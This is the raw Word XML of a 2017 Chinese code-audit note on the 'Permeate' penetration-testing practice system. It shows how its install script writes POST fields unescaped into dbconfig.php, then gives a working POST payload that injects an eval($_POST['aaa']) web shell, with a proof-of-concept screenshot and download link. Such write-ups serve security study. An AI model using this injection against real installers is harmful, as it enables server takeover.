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2017年7月11日</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="3780" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="right"/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-----代码审计笔记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Permeate渗透测试系统 审计记录:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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  <w:t>安装GetShell漏洞:</w:t>
      </w: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  <w:t>Step3.php分析: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//仅给出部分关键代码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$link =@mysql_connect($_POST['DB_HOST'], $_POST['DB_USER'], </w:t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$_POST['DB_PASS']);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="84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if (!$link) {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    echo "&lt;script&gt;";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    echo "alert('数据库信息有误');";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    echo "window.history.back();";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    echo "&lt;/script&gt;";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0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这里获取POST传入的 数据库地址 用户名 And 密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这里是可以调用远程数据库或者是禁用Js达到绕过的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>$conf = "&lt;?php\n";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>foreach ($_POST as $key =&gt; $val) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="84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>if ($key != 'username' &amp;&amp; $key != 'password') {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>$conf .= "\t!defined('{$key}') &amp;&amp; define('$key','$val');\n";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 xml:space="preserve">    $a = "\$sex=array('保密','男','女');\n\$edu=array('保密','小学','初中','高中/中专','大专','本科','</w:t>
      </w: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>研究生','博士','博士后');\n\$admins=array('普通用户','管理员')\n?&gt;";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 xml:space="preserve">    $conf = $conf . $a;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 xml:space="preserve">    echo $conf;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/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color w:val="7030A0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (file_put_contents("../conf/dbconfig.php", $conf)) {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 xml:space="preserve">以上代码是获取Post的全部数据 用foreach循环来写入到dbconfig.php这个文件里的 这样 我们可以来先看一下正常的文件是什么样的 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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="1402080"/>
            <wp:effectExtent l="0" t="0" r="8890" b="7620"/>
            <wp:docPr id="1" name="图片 1" descr="TIM图片2017071115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707111502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是这样的 如果我们截断了后面的常量定义 岂不是可以直接写Shell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废话不多说 开始构造PayLoad (PayLoad为Post发送的数据)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漏洞地址:http://网站地址/install/step3.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="548235" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="548235" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>PayLoad:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="548235" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="548235" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DB_HOST=localhost&amp;DB_USER=root&amp;DB_PASS=root&amp;&amp;aaa=;');e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="548235" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="548235" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>val ($_POST['aaa']);//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验证:</w:t>
      </w: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(图片建议放大食用)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3535045" cy="2316480"/>
            <wp:effectExtent l="0" t="0" r="8255" b="7620"/>
            <wp:docPr id="2" name="图片 2" descr="TIM图片2017071115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170711150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  <w:t>现在的dbconfig.php文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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F6000" w:themeColor="accent4" w:themeShade="80"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="3178810"/>
            <wp:effectExtent l="0" t="0" r="8255" b="2540"/>
            <wp:docPr id="3" name="图片 3" descr="TIM图片2017071115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707111509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74310" cy="1925955"/>
            <wp:effectExtent l="0" t="0" r="2540" b="17145"/>
            <wp:docPr id="4" name="图片 4" descr="TIM图片2017071115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707111510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377815" cy="2003425"/>
            <wp:effectExtent l="0" t="0" r="13335" b="15875"/>
            <wp:docPr id="5" name="图片 5" descr="TIM图片2017071115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707111511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  <w:t>成功利用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  <w:t>Poc:</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="center"/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  <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="2411095"/>
            <wp:effectExtent l="0" t="0" r="8255" b="8255"/>
            <wp:docPr id="6" name="图片 6" descr="TIM图片2017071118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707111819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  <w:t>下载地址:http://pan.baidu.com/s/1pLnwRO3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092ABE"/>
    <w:rsid w:val="723A3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